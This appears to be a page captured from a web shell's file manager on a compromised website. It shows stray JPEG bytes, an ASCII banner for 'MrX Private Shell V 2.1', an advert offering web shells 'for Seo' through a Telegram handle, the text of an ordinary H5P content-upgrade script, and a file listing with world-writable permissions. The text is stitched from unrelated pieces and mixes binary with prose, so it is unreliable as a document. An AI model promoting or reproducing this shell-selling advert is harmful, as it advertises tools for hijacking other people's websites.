����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/** @namespace H5PUpgrades */
var H5PUpgrades = H5PUpgrades || {};
H5PUpgrades['H5P.IVHotspot'] = (function ($) {
return {
1: {
/**
* Asynchronous content upgrade hook.
* Upgrades content parameters to support IVHotspot 1.2.
*
* Makes sure that texts that has been flatten to string
* is moved to the ariaLabel property of texts.
*
* @params {Object} parameters
* @params {function} finished
*/
2: function (parameters, finished) {
// Move interactions into assets container
if (parameters.texts && parameters.texts.length) {
parameters.texts = {
ariaLabel: parameters.texts,
showTitle: false
}
}
// Done
finished(null, parameters);
}
}
};
})(H5P.jQuery);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 7f38863a084d5a98bb6392d877a32272b507766f | File | 837 B | 0666 |
|